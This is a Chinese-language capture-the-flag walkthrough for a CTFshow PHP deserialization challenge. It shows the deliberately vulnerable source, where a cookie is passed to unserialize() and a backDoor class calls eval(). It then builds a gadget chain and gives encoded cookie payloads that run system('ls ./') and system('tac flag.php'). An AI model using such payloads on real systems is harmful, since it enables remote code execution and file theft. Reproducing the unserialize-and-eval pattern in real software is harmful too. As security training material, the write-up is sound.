CTFshow-Web入门-反序列化-257题

1、先代码审计

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-02 17:44:47
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-02 20:33:07
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// Silences every notice/warning for the whole request. This also hides the
// undefined-index notices from the unchecked $_GET reads further down and any
// warning that unserialize() emits on malformed input.
error_reporting(0);
// Echoes this file's own source into the response, so the class layout is public.
highlight_file(__FILE__);

class ctfShowUser{
    private $username='xxxxxx';
    private $password='xxxxxx';
    private $isVip=false;
    private $class = 'info';

    /**
     * Swaps the default 'info' string for an info instance.
     * Note: unserialize() does not run constructors, so an object restored
     * from serialized data carries whatever $class the data specifies.
     */
    public function __construct(){
        $this->class=new info();
    }

    /**
     * Strict comparison of the supplied credentials against the hard-coded
     * property values above.
     *
     * @param mixed $u candidate username
     * @param mixed $p candidate password
     * @return bool true only when both match exactly (===)
     */
    public function login($u,$p){
        $userMatches = ($this->username === $u);
        $passMatches = ($this->password === $p);
        return $userMatches && $passMatches;
    }

    /**
     * Runs when the object is released and calls getInfo() on whatever
     * $class currently holds. The callee is resolved at run time, so any
     * class in scope that defines getInfo() can be reached from here if
     * $class was populated from untrusted serialized data.
     */
    public function __destruct(){
        $this->class->getInfo();
    }

}

class info{
    private $user='xxxxxx';

    /**
     * Returns the stored user label. This is the benign getInfo() that
     * ctfShowUser::__destruct() is written to reach.
     *
     * @return string
     */
    public function getInfo(){
        $label = $this->user;
        return $label;
    }
}

class backDoor{
    // No constructor or setter exists in this file, so within this code the
    // only way this property gets a value is through unserialize().
    private $code;
    /**
     * SECURITY: eval() of a property that attacker-supplied serialized data can
     * set; reachable via ctfShowUser::__destruct() whenever $class holds a
     * backDoor. There is no safe variant of this call — the mitigation is to
     * never unserialize() untrusted input (see the $_COOKIE['user'] read below),
     * or at minimum to restrict unserialize() with its allowed_classes option.
     */
    public function getInfo(){
        eval($this->code);
    }
}

// NOTE: the $_GET keys are read before the isset() check, so a missing
// parameter raises an undefined-index notice/warning (hidden by
// error_reporting(0)) and leaves the variable null.
$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    // SECURITY: unserialize() of an attacker-controlled cookie. Any class
    // declared in this file can be instantiated with arbitrary property
    // values, and ctfShowUser::__destruct() fires on the result no matter
    // what login() returns. Prefer a data-only format (json_decode()), or at
    // least pass ['allowed_classes' => [...]] to unserialize() and verify the
    // result with instanceof before calling methods on it.
    $user = unserialize($_COOKIE['user']);
    // Return value is discarded; if unserialize() returned false this method
    // call itself errors out.
    $user->login($username,$password);
}

根据逻辑要求:

  • 用户名、密码需与 ctfShowUser 中硬编码的值一致;
  • __construct()魔术方法中实例化的类需要改为 backDoor（注意反序列化并不会调用 __construct()，真正起作用的是 class 属性被替换为 backDoor 对象，随后由 __destruct() 调用其 getInfo()）
  • backDoor 中有 RCE（eval），因此需要自定义 $code，用于读取目录、读取文件内容

2、保留有效部分,构造链

<?php
class ctfShowUser{
    /**
     * Generator-side stand-in for the target class: only the property that
     * the target's __destruct() chain reads is kept. `$class` is not declared
     * here, so it is created as a dynamic public property and is serialized
     * under the plain key `class` (visible in the cookie below).
     */
    public function __construct(){
        $this->class=new backDoor();
    }

}


class backDoor{
    // The string the target's backDoor::getInfo() passes to eval(). Being
    // private, it is serialized under the mangled name "\0backDoor\0code",
    // which appears as %00backDoor%00code in the encoded cookie below.
    private $code="system('ls ./');";
}
// Serialize the chain and URL-encode it for use as the `user` cookie; the
// encoding is needed because the private-property name contains null bytes.
echo urlencode(serialize(new ctfShowUser()));

payload:

url:?username=xxxxxx&password=xxxxxx

cookie(读取目录):O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A14%3A%22%00backDoor%00code%22%3Bs%3A16%3A%22system%28%27ls+.%2F%27%29%3B%22%3B%7D%7D

image-20241211095225433

cookie(读取文件):O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A14%3A%22%00backDoor%00code%22%3Bs%3A23%3A%22system%28%27tac+flag.php%27%29%3B%22%3B%7D%7D

image-20241211095332131